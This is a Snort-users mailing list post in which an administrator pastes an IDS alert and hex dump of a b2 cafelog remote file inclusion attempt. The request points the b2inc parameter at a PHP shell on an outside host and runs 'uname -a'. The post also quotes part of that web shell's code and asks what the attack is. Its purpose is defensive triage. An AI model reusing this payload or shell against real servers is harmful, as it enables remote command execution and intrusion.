Is it an real attack ?

[Roberto Samarone Araújo (RSA) <sama () inf ufsc br>]

Hi,

     Verifying the snort logs, I found the following attack:

[nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt

000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67   GET //b2-tools/g
010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63   m-2-b2.php?b2inc
020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E   =http://www.corn
030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63   age.hpg.com.br/c
040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61   md.txt??&cmd=una
050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61   me%20-a?&cmd=una
060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58   me%20-a;echo%20X
070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A   FTEAM HTTP/1.0..
080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A   HOST: mysite.com-
090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A            mysite.com ....

I entered on the site: http://www.cornage.hpg.com.br/cmd.txt and I found the
following code:

-cmd  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  $output = str_replace("\n","\n-cmd ",$output);
  if (!empty($output)) echo  str_replace(">", ">", str_replace("<", "<",
$output));

?>

What kind of attack is this ? Are there any place where can I find
informations about this attack ?

Thanks,

Robert




-------------------------------------------------------
This SF.net email is sponsored by: IBM Linux Tutorials.
Become an expert in LINUX or just sharpen your skills.  Sign up for IBM's
Free Linux Tutorials.  Learn everything from the bash shell to sys admin.
Click now! http://ads.osdn.com/?ad_id=1278&alloc_id=3371&op=click
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users